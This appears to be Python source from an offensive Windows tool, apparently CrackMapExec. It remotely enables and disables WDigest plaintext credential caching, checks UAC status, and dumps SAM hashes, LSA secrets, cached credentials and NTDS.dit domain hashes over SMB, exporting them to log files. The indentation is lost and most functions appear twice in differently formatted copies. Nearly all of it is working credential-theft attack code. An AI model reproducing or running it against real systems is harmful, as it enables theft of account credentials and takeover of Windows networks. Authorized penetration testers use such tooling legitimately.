def disable(self):
remoteOps = RemoteOperations(self.smbconnection, self.doKerb)
remoteOps.enableRegistry()
self.rrp = remoteOps._RemoteOperations__rrp
if self.rrp is not None:
ans = rrp.hOpenLocalMachine(self.rrp)
regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(self.rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
keyHandle = ans['phkResult']
try:
rrp.hBaseRegDeleteValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
except:
self.logger.success('UseLogonCredential registry key not present')
try:
remoteOps.finish()
except:
pass
return
try:
#Check to make sure the reg key is actually deleted
rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
except DCERPCException:
self.logger.success('UseLogonCredential registry key deleted successfully')
try:
remoteOps.finish()
except:
pass
def enable(self):
remoteOps = RemoteOperations(self.smbconnection, self.doKerb)
remoteOps.enableRegistry()
self.rrp = remoteOps._RemoteOperations__rrp
if self.rrp is not None:
ans = rrp.hOpenLocalMachine(self.rrp)
regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(
self.rrp, regHandle,
'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'
)
keyHandle = ans['phkResult']
rrp.hBaseRegSetValue(self.rrp, keyHandle, 'UseLogonCredential\x00',
rrp.REG_DWORD, 1)
rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle,
'UseLogonCredential\x00')
if int(data) == 1:
self.logger.success(
'UseLogonCredential registry key created successfully')
try:
remoteOps.finish()
except:
pass
def disable(self):
remoteOps = RemoteOperations(self.smbconnection, self.doKerb)
remoteOps.enableRegistry()
self.rrp = remoteOps._RemoteOperations__rrp
if self.rrp is not None:
ans = rrp.hOpenLocalMachine(self.rrp)
regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(
self.rrp, regHandle,
'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'
)
keyHandle = ans['phkResult']
rrp.hBaseRegDeleteValue(self.rrp, keyHandle,
'UseLogonCredential\x00')
try:
#Check to make sure the reg key is actually deleted
rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle,
'UseLogonCredential\x00')
except DCERPCException:
self.logger.success(
'UseLogonCredential registry key deleted successfully')
try:
remoteOps.finish()
except:
pass
def enum(self):
remoteOps = RemoteOperations(self.smbconnection, self.doKerb)
remoteOps.enableRegistry()
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System')
keyHandle = ans['phkResult']
dataType, uac_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'EnableLUA')
self.logger.success("Enumerating UAC status")
if uac_value == 1:
self.logger.highlight('1 - UAC Enabled')
elif uac_value == 0:
self.logger.highlight('0 - UAC Disabled')
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
remoteOps.finish()
def enum(self):
remoteOps = RemoteOperations(self.smbconnection, self.doKerb)
remoteOps.enableRegistry()
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(
remoteOps._RemoteOperations__rrp, regHandle,
'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System')
keyHandle = ans['phkResult']
dataType, uac_value = rrp.hBaseRegQueryValue(
remoteOps._RemoteOperations__rrp, keyHandle, 'EnableLUA')
self.logger.success("Enumerating UAC status")
if uac_value == 1:
self.logger.highlight('1 - UAC Enabled')
elif uac_value == 0:
self.logger.highlight('0 - UAC Disabled')
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
remoteOps.finish()
def enable(self):
remoteOps = RemoteOperations(self.smbconnection, self.doKerb)
remoteOps.enableRegistry()
self.rrp = remoteOps._RemoteOperations__rrp
if self.rrp is not None:
ans = rrp.hOpenLocalMachine(self.rrp)
regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(self.rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
keyHandle = ans['phkResult']
rrp.hBaseRegSetValue(self.rrp, keyHandle, 'UseLogonCredential\x00', rrp.REG_DWORD, 1)
rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
if int(data) == 1:
self.logger.success('UseLogonCredential registry key created successfully')
try:
remoteOps.finish()
except:
pass
class DumpSecrets:
def __init__(self, connection, logger):
self.__useVSSMethod = False
self.__smbConnection = connection.conn
self.__db = connection.db
self.__host = connection.host
self.__hostname = connection.hostname
self.__remoteOps = None
self.__SAMHashes = None
self.__NTDSHashes = None
self.__LSASecrets = None
#self.__systemHive = options.system
#self.__securityHive = options.security
#self.__samHive = options.sam
#self.__ntdsFile = options.ntds
self.__bootKey = None
self.__history = False
self.__noLMHash = True
self.__isRemote = True
self.__outputFileName = os.path.join(os.path.expanduser('~/.cme'), 'logs/{}_{}'.format(connection.hostname, connection.host))
self.__doKerberos = False
self.__justDC = False
self.__justDCNTLM = False
self.__pwdLastSet = False
self.__resumeFileName = None
self.__logger = logger
def getBootKey(self):
# Local Version whenever we are given the files directly
bootKey = ''
tmpKey = ''
winreg = winregistry.Registry(self.__systemHive, self.__isRemote)
# We gotta find out the Current Control Set
currentControlSet = winreg.getValue('\\Select\\Current')[1]
currentControlSet = "ControlSet%03d" % currentControlSet
for key in ['JD','Skew1','GBG','Data']:
logging.debug('Retrieving class info for %s'% key)
ans = winreg.getClass('\\%s\\Control\\Lsa\\%s' % (currentControlSet,key))
digit = ans[:16].decode('utf-16le')
tmpKey = tmpKey + digit
transforms = [ 8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7 ]
tmpKey = unhexlify(tmpKey)
for i in xrange(len(tmpKey)):
bootKey += tmpKey[transforms[i]]
logging.info('Target system bootKey: 0x%s' % hexlify(bootKey))
return bootKey
def checkNoLMHashPolicy(self):
logging.debug('Checking NoLMHash Policy')
winreg = winregistry.Registry(self.__systemHive, self.__isRemote)
# We gotta find out the Current Control Set
currentControlSet = winreg.getValue('\\Select\\Current')[1]
currentControlSet = "ControlSet%03d" % currentControlSet
#noLmHash = winreg.getValue('\\%s\\Control\\Lsa\\NoLmHash' % currentControlSet)[1]
noLmHash = winreg.getValue('\\%s\\Control\\Lsa\\NoLmHash' % currentControlSet)
if noLmHash is not None:
noLmHash = noLmHash[1]
else:
noLmHash = 0
if noLmHash != 1:
logging.debug('LMHashes are being stored')
return False
logging.debug('LMHashes are NOT being stored')
return True
def enableRemoteRegistry(self):
bootKey = None
try:
self.__remoteOps = RemoteOperations(self.__smbConnection, self.__doKerberos)
#if self.__justDC is False and self.__justDCNTLM is False or self.__useVSSMethod is True:
self.__remoteOps.enableRegistry()
self.__bootKey = self.__remoteOps.getBootKey()
# Let's check whether target system stores LM Hashes
self.__noLMHash = self.__remoteOps.checkNoLMHashPolicy()
except Exception as e:
traceback.print_exc()
logging.error('RemoteOperations failed: %s' % str(e))
def SAM_dump(self):
self.enableRemoteRegistry()
try:
SAMFileName = self.__remoteOps.saveSAM()
self.__SAMHashes = SAMHashes(SAMFileName, self.__bootKey, self.__logger, self.__db, self.__host, self.__hostname, isRemote = True)
self.__SAMHashes.dump()
self.__SAMHashes.export(self.__outputFileName)
except Exception as e:
traceback.print_exc()
logging.error('SAM hashes extraction failed: %s' % str(e))
self.cleanup()
def LSA_dump(self):
self.enableRemoteRegistry()
try:
SECURITYFileName = self.__remoteOps.saveSECURITY()
self.__LSASecrets = LSASecrets(SECURITYFileName, self.__bootKey, self.__logger, self.__remoteOps, isRemote=self.__isRemote)
self.__LSASecrets.dumpCachedHashes()
self.__LSASecrets.exportCached(self.__outputFileName)
self.__LSASecrets.dumpSecrets()
self.__LSASecrets.exportSecrets(self.__outputFileName)
except Exception as e:
traceback.print_exc()
logging.error('LSA hashes extraction failed: %s' % str(e))
self.cleanup()
def NTDS_dump(self, method, pwdLastSet, history):
self.__pwdLastSet = pwdLastSet
self.__history = history
try:
self.enableRemoteRegistry()
except Exception:
traceback.print_exc()
# NTDS Extraction we can try regardless of RemoteOperations failing. It might still work
if method == 'vss':
self.__useVSSMethod = True
if self.__useVSSMethod:
NTDSFileName = self.__remoteOps.saveNTDS()
else:
NTDSFileName = None
self.__NTDSHashes = NTDSHashes(NTDSFileName, self.__bootKey, self.__logger, isRemote=True, history=self.__history,
noLMHash=self.__noLMHash, remoteOps=self.__remoteOps,
useVSSMethod=self.__useVSSMethod, justNTLM=self.__justDCNTLM,
pwdLastSet=self.__pwdLastSet, resumeSession=self.__resumeFileName,
outputFileName=self.__outputFileName)
#try:
self.__NTDSHashes.dump()
#except Exception as e:
# traceback.print_exc()
# logging.error(e)
# if self.__useVSSMethod is False:
# logging.info('Something wen\'t wrong with the DRSUAPI approach. Try again with -use-vss parameter')
self.cleanup()
def cleanup(self):
logging.info('Cleaning up... ')
if self.__remoteOps:
self.__remoteOps.finish()
if self.__SAMHashes:
self.__SAMHashes.finish()
if self.__LSASecrets:
self.__LSASecrets.finish()
if self.__NTDSHashes:
self.__NTDSHashes.finish()
class DumpSecrets:
def __init__(self, connection):
self.__useVSSMethod = False
self.__smbConnection = connection.conn
self.__db = connection.db
self.__host = connection.host
self.__hostname = connection.hostname
self.__remoteOps = None
self.__SAMHashes = None
self.__NTDSHashes = None
self.__LSASecrets = None
#self.__systemHive = options.system
#self.__securityHive = options.security
#self.__samHive = options.sam
#self.__ntdsFile = options.ntds
self.__bootKey = None
self.__history = False
self.__noLMHash = True
self.__isRemote = True
self.__outputFileName = os.path.join(
os.path.expanduser('~/.cme'),
'logs/{}_{}'.format(connection.hostname, connection.host))
self.__doKerberos = False
self.__justDC = False
self.__justDCNTLM = False
self.__pwdLastSet = False
self.__resumeFileName = None
self.__logger = connection.logger
def getBootKey(self):
# Local Version whenever we are given the files directly
bootKey = ''
tmpKey = ''
winreg = winregistry.Registry(self.__systemHive, self.__isRemote)
# We gotta find out the Current Control Set
currentControlSet = winreg.getValue('\\Select\\Current')[1]
currentControlSet = "ControlSet%03d" % currentControlSet
for key in ['JD', 'Skew1', 'GBG', 'Data']:
logging.debug('Retrieving class info for %s' % key)
ans = winreg.getClass('\\%s\\Control\\Lsa\\%s' %
(currentControlSet, key))
digit = ans[:16].decode('utf-16le')
tmpKey = tmpKey + digit
transforms = [8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7]
tmpKey = unhexlify(tmpKey)
for i in xrange(len(tmpKey)):
bootKey += tmpKey[transforms[i]]
logging.info('Target system bootKey: 0x%s' % hexlify(bootKey))
return bootKey
def checkNoLMHashPolicy(self):
logging.debug('Checking NoLMHash Policy')
winreg = winregistry.Registry(self.__systemHive, self.__isRemote)
# We gotta find out the Current Control Set
currentControlSet = winreg.getValue('\\Select\\Current')[1]
currentControlSet = "ControlSet%03d" % currentControlSet
#noLmHash = winreg.getValue('\\%s\\Control\\Lsa\\NoLmHash' % currentControlSet)[1]
noLmHash = winreg.getValue('\\%s\\Control\\Lsa\\NoLmHash' %
currentControlSet)
if noLmHash is not None:
noLmHash = noLmHash[1]
else:
noLmHash = 0
if noLmHash != 1:
logging.debug('LMHashes are being stored')
return False
logging.debug('LMHashes are NOT being stored')
return True
def enableRemoteRegistry(self):
bootKey = None
try:
self.__remoteOps = RemoteOperations(self.__smbConnection,
self.__doKerberos)
#if self.__justDC is False and self.__justDCNTLM is False or self.__useVSSMethod is True:
self.__remoteOps.enableRegistry()
self.__bootKey = self.__remoteOps.getBootKey()
# Let's check whether target system stores LM Hashes
self.__noLMHash = self.__remoteOps.checkNoLMHashPolicy()
except Exception as e:
traceback.print_exc()
logging.error('RemoteOperations failed: %s' % str(e))
def SAM_dump(self):
self.enableRemoteRegistry()
try:
SAMFileName = self.__remoteOps.saveSAM()
self.__SAMHashes = SAMHashes(SAMFileName,
self.__bootKey,
self.__logger,
self.__db,
self.__host,
self.__hostname,
isRemote=True)
self.__SAMHashes.dump()
self.__SAMHashes.export(self.__outputFileName)
except Exception as e:
traceback.print_exc()
logging.error('SAM hashes extraction failed: %s' % str(e))
self.cleanup()
def LSA_dump(self):
self.enableRemoteRegistry()
try:
SECURITYFileName = self.__remoteOps.saveSECURITY()
self.__LSASecrets = LSASecrets(SECURITYFileName,
self.__bootKey,
self.__logger,
self.__remoteOps,
isRemote=self.__isRemote)
self.__LSASecrets.dumpCachedHashes()
self.__LSASecrets.exportCached(self.__outputFileName)
self.__LSASecrets.dumpSecrets()
self.__LSASecrets.exportSecrets(self.__outputFileName)
except Exception as e:
traceback.print_exc()
logging.error('LSA hashes extraction failed: %s' % str(e))
self.cleanup()
def NTDS_dump(self, method, pwdLastSet, history):
self.__pwdLastSet = pwdLastSet
self.__history = history
try:
self.enableRemoteRegistry()
except Exception:
traceback.print_exc()
# NTDS Extraction we can try regardless of RemoteOperations failing. It might still work
if method == 'vss':
self.__useVSSMethod = True
if self.__useVSSMethod:
NTDSFileName = self.__remoteOps.saveNTDS()
else:
NTDSFileName = None
self.__NTDSHashes = NTDSHashes(NTDSFileName,
self.__bootKey,
self.__logger,
isRemote=True,
history=self.__history,
noLMHash=self.__noLMHash,
remoteOps=self.__remoteOps,
useVSSMethod=self.__useVSSMethod,
justNTLM=self.__justDCNTLM,
pwdLastSet=self.__pwdLastSet,
resumeSession=self.__resumeFileName,
outputFileName=self.__outputFileName)
#try:
self.__NTDSHashes.dump()
#except Exception as e:
# traceback.print_exc()
# logging.error(e)
# if self.__useVSSMethod is False:
# logging.info('Something wen\'t wrong with the DRSUAPI approach. Try again with -use-vss parameter')
self.cleanup()
def cleanup(self):
logging.info('Cleaning up... ')
if self.__remoteOps:
self.__remoteOps.finish()
if self.__SAMHashes:
self.__SAMHashes.finish()
if self.__LSASecrets:
self.__LSASecrets.finish()
if self.__NTDSHashes:
self.__NTDSHashes.finish()